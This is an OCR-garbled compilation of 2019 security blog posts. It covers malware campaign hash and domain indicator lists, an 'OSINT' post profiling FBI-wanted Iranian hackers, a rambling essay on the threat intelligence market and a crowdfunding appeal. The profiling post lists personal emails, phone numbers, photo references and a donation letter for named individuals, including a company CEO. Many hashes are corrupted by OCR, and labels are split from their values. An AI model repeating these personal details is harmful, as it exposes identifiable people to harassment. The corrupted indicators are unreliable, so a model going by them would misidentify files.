hxxp://zaxarstore.com - 185.82.210.24 


hxxp://zaxargames.com 


hxxp://zaxarsearch.com 
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Related malicious MD5s p art of known to have participated in the campaign: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 
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5c60400d7663b9a3fedd93baf0156df9 


5dd18f122fbe022e6e366d79d5b2b8a0 


225802a12e3aaeb9773b681ebe96bbe7 


a50ef877e6329d2851de3fd4f49b8f7a 


C82f177911708cd8373f7d788ce5ef3a 


73b48b697e7e09e2325656734eaf9f48 


522cb664e0284abf055315d327ff9c6d 


225b1ab5889506d39643d736d15fe20d 


MD5: 3ca8378d493d9aal248359c44cb0eeb8 


MD5: 7¢c897ce217b05bb1694a924afa34096c 


MD5: 73b48b697e7e09e2325656734eaf9f48 


MD5: 310e8b0e4f6dbd23c74b9fec300a24f6 


Related malicious MD5s known to have participated in the campaign: 


MD5: 225b1ab5889506d39643d736d15fe20d 


MD5: 3ca8378d493d9aal248359c44cb0eeb8 


MD5: 7b62994888fdf0c08a357cc9c600c2c4d 


MD5: 5b3fcbe6f8071e9035b8810dd3b0f143 


3939 


MD5: 58d9aa76eaed4710e22f835c6c71159e 


MD5: 3d327881d2950c3c7d0a58ecaal5720d 


MD5: 37a90a8afldd4c6b68cd54ddb8c6d37d 


MD5: 409a8c35651363ab2ba8d1d39e257d82 


MD5: 605425d1dbade7c978ebdc313b6312d5 


Related malicious MD5s known to have participated in the campaign: 


MD5: 201cfcfbled6dcaf229073318c4aaf06 


MD5: 8a9b2c23cc50f9798159297d300b0c46 


MD5: 0149de171a6530737blae82e9cf9b0cf 
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MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


1cc70f8fd134bf7f556fca762a0a8ee7 


36e083ae0d58cb2f342f4cb81d6af88c 


1cc70f8fd134bf7f556fca762a0a8ee7 


0149de171a6530737blae82e9cf9bOcf 


3092c54065a78ec88122e066bccf6238 


1cc70f8fd134bf7f556fca762a0a8ee7 


0149de171a6530737blae82e9cf9bOcf 


049684e041281f3f7c90fb75cdc70e09 


1cc70f8fd134bf7f556fca762a0a8ee7 


6d5edf93cle4a2d1e2e5777884ed326f 


8998c75fbd86bb63d4151a810balb4de 
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MD5: 1cc70f8fd134bf7f556fca762a0a8ee7 


Related malicious MD5s known to have participated in the campaign: 


MD5: 3ca8378d493d9aal248359c44cb0eeb8 


MD5: 58d9aa76eaed4710e22f835c6c71159e 


MD5: 762994888fdf0c08a357cc9c600c2c4d 


MD5: 5b3fcbe6f8071e9035b8810dd3b0f143 


MD5: 3d327881d2950c3c7d0a58ecaal5720d 


MD5: 37a90a8afldd4c6b68cd54ddb8c6d37d 


MD5 :409a8c35651363ab2ba8d1d39e257d82 
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MD5 :605425d1dbade7c978ebdc313b6312d5 


Related malicious MD5s known to have participated in the campaign: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


dafelc1189a6fc55800d0874ffd6567c 


c66d0521a736b73bbd109dedba2da396 


6cce70d4d7280c7f3ec913217d2b3293 


cab53b3a6cc7cd8c0b04e0521770b35c 


f085905595f59ac025b67c3756babe99 


201cfcfbled6dcaf229073318c4aaf06 


41c2f3797480a1016741cbaa232da336 


5943 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


5944 


6f31fd7b8de723a6e6bab77d22276e47 


0cc657e83c5a74b7edcfe0827a976d08 


3323e84cf633173db496c2f6402ffd81 


265c61469587e932f384e862a0c7065d 


e9008ecb5da99d71c0541652aa6d5bc6 


26570d6bebf71373c25dbf1e53208444 


e€1086a5b5c504b95dda3fbd90758a429 


8998c75fbd86bb63d4151a810balb4de 


0743c40c4791f4cba8488a4a908f3a57 


36e083ae0d58cb2f342f4cb81d6af88c 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


0357cO02fc9fdeff9ad3f78876438256b 


3092c54065a78ec88122e066bccf6238 


laed2fc8ca434c06a6ac90264634769c 


ebdf43127a54c134bb3b01ce74bb5a42 


049684e041281f3f7c90fb75cdc70e09 


8a9b2c23cc50f9798159297d300b0c46 


fa15abd8810b2e9349b7723b7cb1d132 


0149de171a6530737blae82e9cf9bOcf 


6d5edf93cle4a2d1e2e5777884ed326f 


1cc70f8fd134bf7f556fca762a0a8ee7 


19537 7bef6d2b3cb5d56b387fca8ba60 
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Related malicious MD5s known to have participated in the campaign: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


fec37b3989e590d0f3d78c6069bb0cal 


1554933e1243dedb041fec9029ee087c 


a860ed06f5d6f6ab390edfa39c59b164 


61032381f8fb14cac5f9da88651b45be 


4d53a34254cbc5723a5fb960fcd4a166 


Related malicious MD5s known to have participated in the campaign: 


MD5: 
5946 


0357cO2fc9fdeff9ad3f78876438256b 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


201cfcfbled6dcaf229073318c4aaf06 


4900e194aaf35456f9b4a97e1ca38d99 


8a9b2c23cc50f9798159297d300b0c46 


2e4dc797e098104854dc555d93dd084a 


0149de171a6530737blae82e9cf9bOcf 


1cc70f8fd134bf7f556fca762a0a8ee7 


f69ce553ed33506d82e12fabc6f7c67a 


6c1a294a9f6cb3279b68551501ca654a 


fd6e30b879ea2347e1124376b5f2d1cf 
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Related malicious MD5s known to have participated in the campaign: 


MD5: dafe1c1189a6fc55800d0874ffd6567c 


MD5: c66d0521a736b73bbd109dedba2da396 


MD5: 6cce70d4d7280c7f3ec913217d2b3293 


MD5: cab53b3a6cc7cd8c0b04e0521770b35c 


MD5: f085905595f59ac025b67c3756babe99 


MD5: 201cfcfbled6dcaf229073318c4aaf06 


MD5: 41c2f3797480a1016741cbaa232da336 


MD5: 6f31fd7b8de723a6e6bab77d22276e47 


MD5: 0cc657e83c5a74b7edcfe0827a976d08 
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MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


3323e84cf633173db496c2f6402ffd81 


265c61469587e932f384e862a0c7065d 


e9008ecb5da99d71c0541652aa6d5bc6 


26570d6bebf71373c25dbf1e53208444 


e1086a5b5c504b95dda3fbd90758a429 


8998c75fbd86bb63d4151a810balb4de 


0743c40c4791f4cba8488a4a908f3a57 


36e083ae0d58cb2f342f4cb81d6af88c 


0357cO02fc9fdeff9ad3f78876438256b 


3092c54065a78ec88122e066bccf6238 


laed2fc8ca434c06a6ac90264634769c 
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MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


ebdf43127a54c134bb3b01ce74bb5a42 


049684e041281f3f7c90fb75cdc70e09 


8a9b2c23cc50f9798159297d300b0c46 


Pfa15abd8810b2e9349b7723b7cb1d132 


0149de171a6530737blae82e9cf9bOcf 


6d5edf93cle4a2d1e2e5777884ed326f 


1cc70f8fd134bf7f556fca762a0a8ee7 


195377bef6d2b3cb5d56b387fca8ba60 


Related malicious MD5s known to have participated in the campaign: 
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MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


201cfcfbled6dcaf229073318c4aaf06 


8a9b2c23cc50f9798159297d300b0c46 


0149de171a6530737blae82e9cf9bOcf 


1cc70f8fd134bf7f556fca762a0a8ee7 


36e083ae0d58cb2f342f4cb81d6af88c 


1cc70f8fd134bf7f556fca762a0a8ee7 


0149de171a6530737blae82e9cf9bOcf 


3092c54065a78ec88122e066bccf6238 


1cc70f8fd134bf7f556fca762a0a8ee7 


0149de171a6530737blae82e9cf9bOcf 
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MD5: 0149de171a6530737blae82e9cf9b0cf 


MD5: 049684e041281f3f7c90fb75cdc70e09 


MD5: 1cc70f8fd134bf7f556fca762a0a8ee7 


MD5: 6d5edf93cle4a2d1e2e5777884ed326f 


MD5: 8998c75fbd86bb63d4151a810balb4de 


MD5: 1cc70f8fd134bf7f556fca762a0a8ee7 


Related malicious MD5s known to have participated in the campaign: 


MD5: 23e3c313658bae8632bfc319687 2daf3 


MD5: 225802a12e3aaeb9773b681lebeI96bbe7 
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MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


23e3c313658bae8632bfc3196872daf3 


225802a12e3aaeb9773b681ebeI6bbe7 


b37acl1lb1lcba7739eedac8082be6cc51 


cbefcf14b0c24201c2b8eedaaft5s738 


89724cced12e644a296cf9db1190ed1f 


12cc90ab2a0a2f0c8d208823aff36ad4 


b2f616daf5512b640a70d3e3cc4c019b 


7dc92f595dbf2a5073a94c2ba3a90ed6 


25700c5457c42eb1ae5185b6f577f8e0 


a236c6ab86df7738ab9a9fda53702a50 


55e705f62af72f54b8819dd504e0b793 
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MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


5954 


cbefcf14b0c24201c2b8eedaaft5s8738 


797f1d671eb48c008aa2842cdbe28a91 


cbefcf14b0c24201c2b8eedaaft58738 


93cla7aa2885ac2b123fc16906ea01e0 


b241d2a0f66a40eb0 7fbe0bca529e386 


244677c44af4648ceald3142611dc4c3 


34dc108714b3fb92f41f3efac3e60ba5 


225802a12e3aaeb9773b681ebe96bbe7 


f140fed5014b826c99fdd7429f8afb89 


3d02cbb7ed1c72c2df209a3342b9efed 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


Related malicious MD5s known to have participated in the campaign: 


MD5: 


MD5: 


86f527fb98672055217428a77e337252 


df393d5e0cc4cdbbd110d2a09cb42983 


894d046c09f338e657ec7828c4cb69fc7 


fc60d4b0fce4c4e3779762bce0f5b69d 


f959e44ac691448a31c0e051fd39d2fa 


9cbe8022efc081c5ba3c1f291989277f 


€6025966d8f72a80884eb7be19d31fcb 


734a9c8b47712d396bcd1562a229517e 
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MD5: e6025966d8f72a80884eb7be19d31fcb 


MD5: 9cbe8022efc081c5ba3c1f291989277f 


Related domains known to have participated in the campaign: 


hxxp://syscos15.ru 


hxxp://y9807akgtzcrolb.nidetafzy.ru 


hxxp://syscos19.ru 


hxxp://sendme13.ru 


hxxp://dysy.storial.ru 


hxxp://sendme12.ru 
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hxxp://sendme9.ru 


hxxp://sendme8sg.ru 


hxxp://syscos30.ru 


hxxp://syscos18.ru 


Stay tuned! 


1. https: //www.secureworks.com/research/rogue-antivirus-part-2 


15.1.2 Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - 
OSINT Analysis (2019-01-16 11:09) 


Remember my most recently published "[1]Assessing The Computer Network Operation 
(CNO) Capabilities of the Islamic Republic of Iran - Report"? The report details and discusses 


in-depth the most prolific Iran-based government-sponsored and tolerated hacking groups 
including the following groups: 


- Ashiyane Digital Security Team 
- Ilranhack Security Team 
- Iranian Datacoders Security Team 


- Iran Security Team a.k.a SEPANTA Team/Iran Cyber Army 2012/2013 
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- IDH Security Team 

- Bastan Security Team 

- NOPO Digital Security Team 

- Shekaf Security Team 

- Mafia Hacking Team 

- Iran Black Hats Team 

- Delta Hacking Security Team 

- Digital Boys Underground Team 


- Irlst Security Team 


| recently came across to [2]FBI’s Most Wanted Cybercriminals List and decided to elab- 
orate more by providing actionable Threat Intelligence on some of the most Wanted Iranian 
cybercriminals with the idea to help law enforcement and to inform the security industry and 
to ensure that the cybercriminals behind these campaigns can be properly tracked down and 
prosecuted. 


| can be reached at dancho.danchev@hush.com 


In this OSINT analysis I’ll provide actionable intelligence including personally identifiable 
information some of FBI’s Most Wanted Iranian cybercriminals including [3JAhmad Fathi, 
[4]Hamid Firoozi, [5JAmin Shokohi, [6JMohammad Sadegh Ahmadzadegan, [7]Omid Ghaf- 
farinia, [8]Sina Keissar, [9]Nader Saedi including the infamous ITSec Team and the Mersad 
Co. company. 
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Personally Identifiable Information regarding Sun Army Team Members including ITSec Team 
and the Mersad Co. company: 


Sun Army Team Members: 


Nitrojen26, Mehdy007, MagicCoder, tHe.Mo3tafA, Plus, BodyGuard 


Sample Network Infrastructure Reconnissance: 


hxxp://sun-army.org - 185.53.179.10 - Email: Sun.Army@asia.com; Lord.private@ymail.com 
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Name: Omid Ghaffarinia 
Handle: Plus 


Email: omid.ghaffarinia@gmail.com; plus.ashiyane@gmail.com; 
omid.ghaffarinia@alum.sharif.edu 


Phone: 091 2444 9002 


Web Site: http://alum.sharif.ir/ omid.ghaffarinia/; http://alum.sharif.ir/ omid.ghaffarinia/; 
http://omidplus.persiangig.com/; 


Social Media Accounts: https://plus.google.com/109226633947780718251; https:/ 
/plus.google.com/109226633947780718251 


Personal Photos of Omid Ghaffarinia a.k.a Plus: 
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5965 
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Sample Personal Photos from a Train Trip: 
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5969 


Handle: MagicCoder 
Email: MagicCOd3r@gmail.com 


Web Site: http://magiccoder.ir 


Handle: Mehdy007 


Email: mehdy007@hotmail.fr 


Web Site: http://mehdy007.persiangig.com 


Sample Sun Army Cover Art Photos: 
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~ Sun Army 


SUN “ARMY ORG SUN ARMY. ORG 
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ITSec Team a.k.a Amn pardazesh kharazmi a.k.a Pooya Digital Security Group Members 


Pejvak, M3hr@n.S, Am!rkh@n, Doosib, H4mid@Tm3l, R3dmOve, Provider, anmadbady 


yg 
AS 


a 
IT Security Research & Penetration Testing Team 


Sample Team Member Personally Identifiable Information: 
Name: Amin Shokohi 

Handle: Pejvak 

Email: pejv4k@yahoo.com 


Web Site: http://pejv4k.persiangig.com; http://pejv4k.110mb.com 


Handle: Mehr@n.S 


Email: M3hran.S@gmail.com 


Sample Network Infrastructure Reconnaissance: 


http://itsecteam.com/ 
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Social Network Graph of Sun Army Team Members including ITSec Team Members and the 
Mersad Co. company: 
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Name: Mohammad Sagegh Ahmadzadegan 

Handle: Nitrojen26 

Email: nitrOjen26@asia.com; Nitrojen26@yahoo.com; me@sadahm.net 
Web Site: hxxp://sadahm.com 


Social Media Accounts: https://twitter.com/nitrojen26 
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Sample Personal Photos of Mohammad Sagegh Ahmadzadegan a.k.a Nitrojen26: 
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Iranische Kinderkrebshilfe e.V. 


Your oterence You ner Gases One retereece 


Cate 
26.07.2016 


Dear Mr. Ahmadzadegan, dear Mr. Ghaffarinis, 


We would like to seize this opportunity to convey our sincere gratitude for your donation of 
2,705.- € to our charity Iranische Kinderkrebshilfe e.V.. Your donation will be transferred to 
MAHAK — the Society to Support Chiléren Suffering from Cancer in Iran for procuring required 
medication for treating cancer. 


Children receiving treatment due to philanthropic acts like yours will have the chance for hope 
towards a brighter future for themselves and their families. You are truly influencing the life 
of others towards a tangible improvement. 


Thank you again tor your generous support of the effort to help children suffering fram cancer. 


Confirmation of Payme 


Work for results 


Sample Mersad Co. Company Logo: 
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< 


>MERSAD 


‘SLso 2 —— 


Sample Network Infrastructure reconnaissance: 
hxxp://mersad.co/ - 188.40.112.196 


hxxp://mersadco.ir 


Mohammad’s life has strongly tied with programming. After graduation of Computer 
Engineering, he studied IT (E-Commerce) for his Master to know more about the relation of 
business and technology. You can find some large scale software projects managed by him 
like Iran’s SOC, SDIDS, Jolfa Vulnerability DB and etc. Now he is a university lecturer and also 
CEO of Mersad Co. and one of TK) Co. consultants. Mohammad is here to help you how to 
manage a good develop team and guide you to have better usage of technology to achieve 
your business goals. 
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Personal Photos of Mersad Co.CcEO Mohammad Hamidi Esfahani: 
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Personally Identifiable Information regarding Mersad Co. Company CEO Mohammad Hamidi 
Esfahani: 


5983 


Name: Mohammad Hamidi Esfahani 


Email:’m.hamidi.es@gmail.com 


Phone: 0913-304-7591 


Web Sites: http://www.mohammadhamidi.ir/ 


Social Media Accounts: https://www.facebook.com/mohammad.hamidi; https://twit 
ter.com/haj _mamed; https://github.com/mohammadhamidi; https://medium.com/@haj 
_mamed; https://medium.com/@haj _mamed; https://plus.google.com/+mohammad 
hamidiEsfahani; 


Sample Mersad Co. Personal Company Photos: 
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Stay tuned! 


. https: //ddanchev. blogspot .com/2015/07/assessing-computer-network-operation_29.htm 
. https://www.fbi.gov/wanted/cybe 

. https://www.fbi.gov/wanted/cyber/ahmad-fathi 

. https://www.fbi.gov/wanted/cyber/hamid-firoozi 

. https://www.fbi.gov/wanted/cyber/amin-shokohi 

. https://www.fbi.gov/wanted/cyber/mohammad-sadegh-ahmadzadega 

. https://www.fbi.gov/wanted/cyber/omid-ghaffarinia 

. https://www.fbi.gov/wanted/cyber/sina-keissa 


O ON ADU BWN FH 


. https://www.fbi.gov/wanted/cyber/nader-saedi 


15.1.3 The Threat Intelligence Market Segment - A Complete Mockery and IP 
Theft Compromise - An Open Letter to the U.S Intelligence Community 
(2019-01-24 19:25) 


| recently came across to the most recently published [1]DoD Cyberspace Strategy 2018 
which greatly reminded me of a variety of resources that | recently took a look at in terms of 
catching up with some of the latest cyber warfare trends and scenarios. Do you want to be a 
cyber warrior? Do you want to "hunt down the bad guys"? Watch out - Uncle Sam is there to 
spank the very bottom of your digital irrelevance. How come? 


It appears that the U.S is re-claiming back the dominance over the "communication channel" 
using a variety of real-life oriented cyber threats including referencing and citing security 
researchers and NGOs (Non-Profit Organization) as potential threats. Takes you back - doesn’t 
it? If it’s going to be massive it better be good. 
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(2) Non-State Threats. Non-state threats are formal and _ informal 
organizations not bound by national borders, including legitimate nongovernmental 
organizations (NGOs), and illegitimate organizations such as criminal organizations, 
violent extremist organizations, or other enemies and adversaries. Non-state threats use 
cyberspace to raise funds, communicate with target audiences and each other, recruit, 
plan operations, undermine confidence in governments, conduct espionage, and conduct 
direct terrorist actions within cyberspace. Criminal organizations may be national or 
transnational in nature and steal information for their own use, including selling it to raise 
capital and target financial institutions for fraud and theft of funds. They may also be 
used as surrogates by nation-states or non-state threats to conduct attacks or espionage 
through cyberspace. 


(3) Individuals or Small Group Threat. Even individuals or small groups of 
people can attack or exploit US cyberspace, enabled by affordable and readily available 
techniques and malware. Their intentions are as varied as the number of groups and 
individuals. These threats exploit vulnerabilities to gain access to discover additional 
vulnerabilities or sensitive data or maneuver to achieve other objectives. Ethical hackers 
may share the vulnerability information with the network owners, but, more frequently, 
these accesses are used for malicious intent. Some threats are politically motivated and 
use cyberspace to spread their message. The activities of these small-scale threats can 
be co-opted by more sophisticated threats, such as criminal organizations or nation-states, 
often without their knowledge, to execute operations against targets while concealing the 
identity of the threat/sponsor and also creating plausible deniability. 


It’s been several years since | last posted a quality update following my [2]disappear- 
ance and possible kidnapping attempt circa 2010. What really took place during that period of 
time? The rise of ransomware? The rise of Tech Support Scams? Yet another botnet currently 
spreading In The Wild? A market-driven buzz-word generation? Take that - ransomware is there 
to take care, hundreds of thousands of supposedly relevant IOCs (Indicators of Compromise) 
TTPs (tactics techniques and procedures) discussed to the bottom of your PR-relevant online 
presence. The Rise of the Threat Hunter job career opportunity basically empowering with 
you with the almighty skills to "track down" and "shut down" the bad guys? You wish - Uncle 
Sam is always there to take care. 


Let’s discuss the Threat Intelligence market segment and offer an in-depth discussion 
on its inner working including a possible discussion on the Threat Intelligence market segment 
in today’s modern Intelligence Community successfully realizing the consequences of what 
was once a proprietary network known as the Internet - today’s modern cyber warfare opera- 
tional battlefield. 
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Size: 124,928 POE 
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| The functions of this trojan are 


In 4 tcp port 


GulF tend 


Database Viewer Copyright © 1999, Diamond Computer Systems Pty. Ltd. ~ Information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 


Many of my blog readers are familiar with my work throughout the years however what 
you might not be aware of is the fact that throughout the 90’s | used to pioneer the position of 
Technical Collector in the context of processing hundreds of malicious and user-friendly Trojan 
Horses also known as Remote Backdoors what would be later on described as Remote Access 
Tools through my hacker enthusiast years as an independent contractor and novice hacker 
working with the market-leading LockDownCorp anti-trojan horse software including leading to 
what would be later on better described as the foundations of the Threat Intelligence market 
qualitative Technical Collection including the very basics of the foundations of CYBERINT. 


Let’s discuss in-depth the current state of the Threat Intelligence market segment in- 
cluding an in-depth discussion on the Threat Intelligence market segment in the context of 
today’s modern U.S Intelligence Community. 
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¢ Indicators of Compromise - the vary basics of formulating a new buzz-word for what was 
once a proprietary-term coined by the Intelligence Community to populate and dissem- 
inate actionable nation-state Cyberspace data to a variety of defensive and offensive 
Cyber Warfare Units can be best described as a New Age in the area of responsive and 
proactive OSINT type of acquisition methodologies that can be best described as a new 
way to acquire leaked and potentially data-and-resource exposure in a variety of auto- 
mated ways. Generalizing the very basics of the Threat Intelligence market segment in 
the context of potential Indicators of Compromise leaks can be best tackled in a way of 
offering central repositories including "government-free" access including a nation-state 
Early Warning System for potential Cyberspace threat data including a variety of Indica- 
tors of Compromise to prevent wide-spread data and information leaks further protecting 
the U.S Government from current and emerging threats. 


Corporate Sector Data Mining Should Considered - what was once best known as "con- 
ducting cyber espionage through botnets" including the conducting of "cyber espionage 
through data mining of malware-infected corporate networks" can be best described as 
today’s proposed central Incident Response based central-repository empowering the U.S 
Intelligence Community with the necessary data and expertise to stay ahead and act upon 
current and emerging cyber threats. 


¢ Private Sector Cooperation and the "You Wish" mentality - the general assumption that 
the private sector will continue to cooperate and empower the U.S Intelligence Commu- 
nity with the necessary data information and knowledge should be considered a wrong 
approach on the U.S Intelligence Community’s way to further protect the U.S national 
infrastructure including the proactive response to current and emerging cyber threats. 
What can be best done to further protect the U.S Government from current and emerging 
threats can be best described as a modern central-repository of "government-free" access 
based Cyber Threat Data type of platform. 


Slicing the Threat on Pieces Should be Ignored - What can be best described as the pro- 
cess of slicing the threat "on pieces" is today’s modern World of PR agencies and Threat 
Intelligence market segment intermediaries including the active labeling of a particular 
group of interest or an individual as a separate entry leading to an overall mis-confusion 
in the context of actually providing actionable Threat Intelligence to the U.S Intelligence 
Community that could ultimately better protect the U.S National Infrastructure. With the 
mainstream media continuing to raise the buzz around popular terms and newly coined 
cyber threat actor groups in the face of the rise of the advanced persistent threat media- 
buzz generating initiative it should be clearly noted that the overall irrelevance of labeling 
a specific cyber threat actor in the public domain should be considered as an irrelevant ex- 
ercise in the broad context of providing the U.S Intelligence Community with the necessary 
data information and knowledge to stay ahead of current and emerging cyber threats. 


Tactics Techniques and Procedures Should Be Buzz-Word Ignored - The very basics of 
coining a term term for the purpose of describing what can be best described as a gen- 
eral cyber threat methodology known as qualitative assessment should be considered 
as a possible flag raising operation that should be considered as a possible source for 
mis-confusion in terms of the broader context of discussing and reacting to current and 
emerging cyber threats. 


¢ The Rise of the "Threat Hunter" Cyber Security Career Position Is Already Causing 
Headaches - The rise of the "Threat Hunter" career position can be best described as 
a complete failure to understand the basics that drive today’s modern Cyber Warfare 
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Team including possible defensive and offensive Cyber Warfare Units and Cyber Opera- 
tions Groups. With everyone "interested" in becoming a Cyber Warrior including a possi- 
ble "Threat Hunter" it should be noted that the over-supply of private-sector companies 
stealing revenue from Uncle Sam for the purpose of enriching and disseminating action- 
able Threat Intelligence is overly increasing resulting in the overall demise of what was 
once a proprietary technology and know-how in the hands of a few that truly grasped the 
market and its potential successfully serving the needs of the U.S government for years 
to come. 


The Rise of Secondary Markets for IOCs Should Provide "Government-free" Access - The 
general over-supply of market-segment driven repositories of actionable Threat Intelli- 
gence data should be greatly attributed to a variety of factors including the rise of the 
Threat Intelligence market segment and should be considered as a way for the U.S Intel- 
ligence Community to clearly seek a technical and potentially market-segment relevant 
way to populate a potential Cyber Threats data-base using public and proprietary sources 
with a clear "government-free" access in mind. 
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Net Utilities Utilize many common network utilities, including TraceRoute and Ping. 
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Current Proposals to U.S Intelligence Community in Terms of Threat Intelligence and Nation- 
State Actors: 
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Clusted Activity - Taking into consideration the fact that on the majority of occasions the 
majority of quality Threat Intelligence type of data is publicly obtainable using a variety of 
public and potentially proprietary sources is should be considered feasibly possible for the 
U.S Intelligence community to build manage and operate a proactive-based Cyber Threats 
anticipating platform including a possible Early Warning Based type of OSINT-capable sys- 
tem able to anticipate and act upon current and emerging threats with a possible cluster- 
based type of data mining and information processing capabilities potentially serving the 
needs of the U.S Intelligence Community. 


Government-free Access - The very notion that an Indian-based company will successfully 
manage launch and operate a Threat Intelligence business should be largely ignored for 
the very sake of figuring out a way to obtain access to a particular company’s Threat In- 
telligence data information and knowledge citing potential Nation Security issues. What 
should be considered in terms of obtaining access to a company’s data-base citing po- 
tential National Security issues is the so called notion of "government-free" access based 
type of private sector partnership. 


Talent Acquisition Roles - In today’s modern Talent Acquisition Wars it should be clearly 
noted that a select set of key individuals can greatly contribute to the overall demise of 
cybercrime internationally taking into consideration the overall demise of the "Wisdom 
of the Crowds" market-segment driven-concept. What should be considered when hiring 
a potential top-notch Cyber Warfare and Information Warfare-based type of personnel 
shouldn’t be necessary years and decades worth of experience but the overall disruptive 
degree of the individual in terms of "making a change" and "making an impact" compared 
to a certification-based-driven crowd of individuals. 


Central Repository - What the modern U.S Intelligence Community can better do to bet- 
ter protect the nation’s Infrastructure should be considered in something in the lines of a 
central-private-sector driven repository of Threat Intelligence type of data including the 
notion of a "government-free" access in terms of obtaining access to a public or a propri- 
etary company information and data assets. 


1. https://fas.org/irp/doddir/dod/jp3_12.pdf 
2. https://ddanchev. blogspot .com/2018/10/dancho-danchevs-2010-disappearance.htm 


15.1.4 Historical OSINT - Inside the Pay-Pay-Install (PPI) Spyware/Adware Affiliate 
Business (2019-01-27 08:47) 


15.1.5 Undermining Underground Black Markets - An Analysis (2019-01-31 10:36) 


Sometimes, too much rationalism is precisely the worst possible mode of thinking next to 
apathy, and as it usually happens, great and socially oriented visions never materialize due to 
their poor execution or wrongly perceived critical success factors. 


A recently proposed model to disrupt the computer underground’s black markets by imperson- 
ating the traders and undermining their reputations by making them look like "leechers" and 
"rippers", is applaudible, but futile at least in respect to the proposed undermining approaches 
against these communities : 


The concepts discussed are like fighting child pornography by pretending to be a child 
pornographer who when supposedly exchanging child porn, sends back 70+ video footage - 
definitely outrageous. 


How do you get inside an online child porn exchange ring? Theoretically, by demonstrating 
how sick you are by proving you a have collecting, and are "contributing" to the growth of the 
scene in order to prove you're 


If you just think over the idea of disrupting the communications channels by which ille- 
gally obtained data gets transfered online, you'll end up with the realistic answer that all such 
attempts are futile, that’s the nature of the Web, to stimulate communication and interaction 
in news gets that get discovered on a monthly basis. 
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Moreover, the way cyber jihadists are already embracing the Dark Web and hiding be- 
hind crawlers are not welcome here authentication based sites, underground markets for such 


goods have. 


The tactics mentioned 


Here’s another interesting description of the people’s information warfare concept : 


"| don’t see in this a big tragedy,” said a respondent who used the name Lightwatch. 
“Western countries played not the smallest role in the fall of the Soviet Union. But the Russians 
have a very amusing feature — they are able to get up from their knees, under any conditions 
or under any circumstances. As for the West? “You are getting what you deserve.” 


15.2 February 


15.2.1 Astalavista Security Group - Official Campaign Announcement 
(2019-02-03 10:23) 


[1] 
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FUNDING 


Astalavista Security Group - The Underground 2.0 


Astalavista Security 2.0 - A Hacker 
in Every Home 


Dear blog readers, | wanted to let you know that I’ve recently launched a crowd-funding 
Campaign on Indiegogo - "[2]Astalavista Security 2.0 - A Hacker in Every Home" with the idea 
to raise the necessary funds for the upcoming launch of the World’s Largest and Most Popular 
Information Security Portal. 


UPDATE: | wanted to let everyone know that I’ve just posted the following updates re- 
garding the upcoming launch of the portal. How you can help? Consider spreading the word 
further and possibly consider making a modest donation to keep up the campaign going. 


[3]New Update - Official Campaign Announcement 


¢ [4]New Update - Official Astalavista 2.0 - Press Release Launch 


[5]New Update - Official Astalavista 2.0 -Statement of Work 
¢ [6]New Update - Official Astalavista 2.0 - The Big Idea 


¢ [7]New Update - Official Astalavista 2.0 - The Fanciful Story 
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Stay tuned for an additional set of campaign details to be published anytime soon including an 
in-depth information regarding the history of the Portal including the Scene the way we know 
it throughout the 90’s. Stay tuned! 


Remember Astalavista Security Group - The Underground? Basically it used to be my 
primary working place throughout the 90’s and | wanted to say thanks to everyone who 
expressed their interest in the resurrection of the portal including possible feedback and 
personal donations. 


Users interested in contributing with modest funds can always approach me at dan- 
cho.danchev@hush.com including the following [8]Live Skype Conversation Link for the 
purpose of managing and operating the campaign including the upcoming launch of the 
portal. 


Looking forward to receiving your feedback suggestions and general questions. 


Stay tuned! 


1. https://1.bp. blogspot .com/--9tmtjyysOY/XFaksIZg-nI/AAAAAAAATwk/AA79XrU9QYAYAbsVqv5R2¢f hc J5£6j vzgCLcBGAs/s1 
600/Misc_03. png 
2 


. indiegogo.com/projects/astalavista-security-2-0-a-hacker-in-every-home 


. indiegogo.com/projects/astalavista-security-2-0-a-hacker-in-every-home/x/17076830#/updates/1 
. indiegogo.com/projects/astalavista-security-2-0-a-hacker-in-every-home/x/17076830#/updates/2 


. indiegogo.com/projects/astalavista-security-2-0-a-hacker-in-every-home/x/17076830#/updates/4 


. https://www.indiegogo.com/projects/astalavista-security-2-0-a-hacker-in-every-home/x/17076830#/updates/ 


. https://join.skype.com/invite/cf5gmBfNdeYb 


3 
4 
5. : . indiegogo.com/projects/astalavista-security-2-0-a-hacker- in-every-home/x/17076830#/updates/ 
6 
7 
8 


15.2.2 The Current and Future Cyber Threat Landscape - 2019 - A Prediction and 
Current Trends Analysis (2019-02-06 13:27) 


- old school hacktivism - the rise and the decline of the Web Site defacement hacktivism 
market segment can be greatly attributed to a variety of pro-hacking groups internationally 
that would inevitably continue to cause havoc and will continue to affect the infrastructure of 
major including boutique Web sites on a global scale 


- URL shortening services 
6024 


- compromised legitimate Web site 
- opt-in activism 
- ransomware 


monetization 


- malicious economies of scale 
- cyber warfare 


- information warfare 


15.2.3 Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping Panel 
LLC" Scam Domain Portfolio Spotted in the Wild (2019-02-07 10:14) 


BUSINESS AT THE SPEED OF LIFE 


WELCOME TO YOUR SHIPPING PANEL 


Your Shipping Panel LLC has become a dominant force in package delivery with services 


